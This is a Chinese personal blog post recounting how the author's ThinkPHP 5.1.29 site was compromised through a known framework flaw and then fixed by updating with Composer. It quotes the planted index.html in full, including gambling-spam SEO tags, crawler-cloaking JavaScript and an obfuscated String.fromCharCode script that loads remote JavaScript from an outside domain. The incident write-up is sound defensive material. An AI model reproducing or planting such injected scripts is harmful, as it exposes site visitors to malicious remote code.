记一次使用 ThinkPHP 5 框架被挂马 作者: Chuwen 时间: 2020-07-09 分类: 唠嗑闲聊 评论 # 前言 ### 全怪自己没有跟进更新 ThinkPHP 版本,导致被挂马,用的版本是 `ThinkPHP V5.1.29 LTS` # 我是怎么发现的 也是听别人提起我这个网站,我才知道我还有这个网站,然后习惯的登录下看看,结果发现只有首页能打开,其它都 404,我还以为网站配置问题,我又删除了重新建立站点,发现还是一样 直到我看了下 `public/` 目录 ![Snipaste_2020-07-09_13-19-22.png][1] 我才发现 `index.php` 文件被删了,只留下 `index.html` 文件,其文件部分内容是: ``` <!DOCTYPE html> <html lang="zh-CN"> <head> <meta charset="utf-8"> <title>皇冠BET369,皇冠bet安卓版下载,皇冠bet手机版下载</title> <meta name="keywords" content="bet皇冠官网,皇冠登陆注册,皇冠真人平台"/> <meta name="description" content="bet皇冠官网【www.324404.com】皇冠真人平台,皇冠登陆注册,皇冠真人平台,皇冠登陆注册,bet皇冠体育官网,bet皇冠体育下载,皇冠真人平台,皇冠登陆注册,bet皇冠体育官网一直致力于娱乐事业的发展。"/> <meta property="og:image" content="https://*.nowtime.cc/logo.png"/> <script>if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title ="****1班"}</script> <script type="text/javascript"> var xt = String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,115,58,47,47,101,102,104,102,117,104,49,46,99,111,109,47,51,54,53,46,106,115,34,62,60,47,115,99,114,105,112,116,62,); document.write(xt); </script> ``` # 我还以为是自己写的某个后台没有鉴权,导致上传文件出现漏洞 然后我又网上查了下 `ThinkPHP 5 漏洞`,然后就找到了这篇文章:[ThinkPHP5.x漏洞复现][2] # 自己试了试,真能执行任意函数 ![ThinkPHP V5.1.29 LTS 执行任意函数][3] 看到这我就知道了,是 ThinkPHP 的漏洞,也怪自己不及时更新框架,这个框架从18年11月,使用 Composer 安装后,我就没有更新过了,一年半过去了我才知道... # 怎么解决 执行 `composer update topthink/framework` 更新 ![执行 composer update topthink/framework 更新][4] 然后问题就解决了 ![然后问题就解决了][5] [1]: https://cdn.nowtime.cc/2020/07/09/2790040883.png [2]: https://www.freebuf.com/articles/web/230787.html [3]: https://cdn.nowtime.cc/2020/07/09/1667353005.png [4]: https://cdn.nowtime.cc/2020/07/09/1475891042.png [5]: https://cdn.nowtime.cc/2020/07/09/3678407928.png